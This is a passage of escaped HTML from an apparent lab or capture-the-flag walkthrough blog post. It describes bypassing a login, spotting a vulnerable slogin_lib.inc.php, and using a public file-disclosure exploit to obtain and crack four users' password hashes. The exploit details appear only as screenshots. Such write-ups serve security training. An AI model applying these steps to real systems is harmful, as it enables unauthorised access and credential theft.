/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Clicking &lt;b&gt;Click here to log out &lt;/b&gt;we find a login form:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLP3wY7Q3V9Prz7MyqVPkjWVbNbJ4RkQyOwNg_cLc9PrB2yPFK_VKRWp9L27eSgWf_NHTO6nlnkGJQkovqJMAnFEHf_OF5nrhjoG-F3vDyCoCUnRo7GsTt3WYARQherT938MhvQMaOVlZl/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;278&quot; data-original-width=&quot;615&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLP3wY7Q3V9Prz7MyqVPkjWVbNbJ4RkQyOwNg_cLc9PrB2yPFK_VKRWp9L27eSgWf_NHTO6nlnkGJQkovqJMAnFEHf_OF5nrhjoG-F3vDyCoCUnRo7GsTt3WYARQherT938MhvQMaOVlZl/s16000/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying any credentials&amp;nbsp;the login works, for instance &lt;b&gt;abcde:abcde&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0H-G2vXe7Jp6v_VIQGIo3LWowlcdPciOWOICjevu3awPJnWm0T_cCbHGTdrviVab1lO1vW42W-fxSa_leSHiZ1gcHnne04jPL2HCPuFGMbS5OW0FodBd5X4CMXQow8xO1WekuR8_fJNCW/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;306&quot; data-original-width=&quot;650&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0H-G2vXe7Jp6v_VIQGIo3LWowlcdPciOWOICjevu3awPJnWm0T_cCbHGTdrviVab1lO1vW42W-fxSa_leSHiZ1gcHnne04jPL2HCPuFGMbS5OW0FodBd5X4CMXQow8xO1WekuR8_fJNCW/s16000/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The page shows a PHP error message about a deprecated function that leads to a vulnerability related to &lt;b&gt;slogin_lib.inc.php&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-TWLGcmzPhRKo-5wpaOeIVFMeyFSOxIhFowOTBrSV22k4Q-aus0tSadRaqWcnwIcDTOhj24vvARBmyxPBpDQbjpgNYKqNakuZPw4BlRWv4WaSkWDPeMq6Z_hotXi5f_0SQYaaRWrc1afq/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;693&quot; data-original-width=&quot;845&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-TWLGcmzPhRKo-5wpaOeIVFMeyFSOxIhFowOTBrSV22k4Q-aus0tSadRaqWcnwIcDTOhj24vvARBmyxPBpDQbjpgNYKqNakuZPw4BlRWv4WaSkWDPeMq6Z_hotXi5f_0SQYaaRWrc1afq/s16000/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for a related exploit we find this &lt;b&gt;File Disclosure/Remote File Inclusion&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPkArwBQc329kDQkj24AdiMLBB-M4cL8M9ECeTnVy_f723AQ47CQ2wHd57WzxnoSwbSEN3FXnsWDqKzKmZBMfHS7SrIAgpXRtJNzNw5frl9Dq6qbDwuJwpp4AVR0YyAjJC7s4ShdZDcP6-/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;277&quot; data-original-width=&quot;774&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPkArwBQc329kDQkj24AdiMLBB-M4cL8M9ECeTnVy_f723AQ47CQ2wHd57WzxnoSwbSEN3FXnsWDqKzKmZBMfHS7SrIAgpXRtJNzNw5frl9Dq6qbDwuJwpp4AVR0YyAjJC7s4ShdZDcP6-/s16000/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcb-UVBYeg34cH-ohyGmAwF78kZT9w3fWwJ7THdrSxBNC-XvA5mWxd3T8qWXNrKrprRUPNY9lvrewUceDoYcdvy_hInD5hDwnMkLb34heGyQtwngrm-Fkny9NBY0IyFMKXSDt-GK8ffBPu/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;366&quot; data-original-width=&quot;697&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcb-UVBYeg34cH-ohyGmAwF78kZT9w3fWwJ7THdrSxBNC-XvA5mWxd3T8qWXNrKrprRUPNY9lvrewUceDoYcdvy_hInD5hDwnMkLb34heGyQtwngrm-Fkny9NBY0IyFMKXSDt-GK8ffBPu/s16000/screenshot.27.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgchjs_pWsZDv1EIHMcZqHrz-9nFFQ3UPevKnbo3OIF7tuH2Ab0YGCLwZ1vUGI2pC8ZVQGjpXRLoV9XTW6hABQQ58-ain8YsaP2y6X8ivXwAhewBE7Y1u8Hbdz9YgzC7nbzm4CKA42ZJFHz/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;302&quot; data-original-width=&quot;714&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgchjs_pWsZDv1EIHMcZqHrz-9nFFQ3UPevKnbo3OIF7tuH2Ab0YGCLwZ1vUGI2pC8ZVQGjpXRLoV9XTW6hABQQ58-ain8YsaP2y6X8ivXwAhewBE7Y1u8Hbdz9YgzC7nbzm4CKA42ZJFHz/s16000/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying the exploit we find credentials for 4 users:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3XXsw5plloJ0pVnguXXLp6oQIBMBkkrSwssX62XYUYhtb0QKLaW3dtMAr_ZDwzRyFch7888C6_mFELwa7Q8j-o3jLP6Kbw5LDg_GlB65rNSW-uvAVD2tY23F-4makeGASMx8fbf9epT9C/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;200&quot; data-original-width=&quot;732&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3XXsw5plloJ0pVnguXXLp6oQIBMBkkrSwssX62XYUYhtb0QKLaW3dtMAr_ZDwzRyFch7888C6_mFELwa7Q8j-o3jLP6Kbw5LDg_GlB65rNSW-uvAVD2tY23F-4makeGASMx8fbf9epT9C/s16000/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Decrypting the hashes:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAaf4L8oIaQGi-lmHsksiChGZ1bmfHaQ43zRRYblWUxyXSYRzV8ytgfYTFWXhgOKTiNsXyzRGmcrigtRMAb03k-k9b6l15-nULzL8pm4cexCey0BE5PAk5CTzqfeM74tBRV8wEm8iO37fx/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;631&quot; data-original-width=&quot;544&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAaf4L8oIaQGi-lmHsksiChGZ1bmfHaQ43zRRYblWUxyXSYRzV8ytgfYTFWXhgOKTiNsXyzRGmcrigtRMAb03k-k9b6l15-nULzL8pm4cexCey0BE5PAk5CTzqfeM74tBRV8wEm8iO37fx/s16000/screenshot.31.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: 